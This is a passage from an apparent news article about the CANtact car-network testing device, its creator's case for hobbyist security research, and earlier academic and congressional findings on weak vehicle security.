If they find some cool things to do and you want to play around with it too, they can share it.” The CANtact, of course, can only test security exploits that require physical access, not remote attacks. But the device does help to automate the testing of security exploits that would be possible once a hacker has already gained a wireless foothold on a car’s network. And the notion of a hacker gaining that sort of initial wireless foothold in a car’s network is more than theoretical. Researchers at the University of Washington and the University of California at San Diego demonstrated in 2011 that they could gain access to an unnamed car’s network through wireless attacks that included a Bluetooth connection, the car’s OnStar-like cellular radio, and even Android malware on the driver’s phone. Evenchick says his CANtact gadget isn’t intended to make any sort of malicious car hacking easier. Instead, he argues, it’s meant to foster hobbyist car hacking and security research that can expose and help fix real vulnerabilities in the digital components of cars and trucks. Miller and Valasek’s earlier research, for example, served as a public demonstration that cars’ internal networks lack basic security protections. Their work led to Senator Edward Markey sending a series of questions to 20 automakers that eventually revealed widespread inattention to security and in some cases a potential lack of anti-hacking measures in their cars and trucks. Only seven of the companies said they used third party security auditing for their vehicles, and only two said they currently had features to respond to a hacker intrusion on their vehicles’ CAN buses. The more attention and testing those car systems receive, Evenchick says, the more secure they’ll eventually become. “You don’t really own a device until you can open it up and tear it apart,” says Evenchick. “Your car is more connected than ever before. 
Just having people know what’s going on with cars and understand them better would be kind of nice.” Source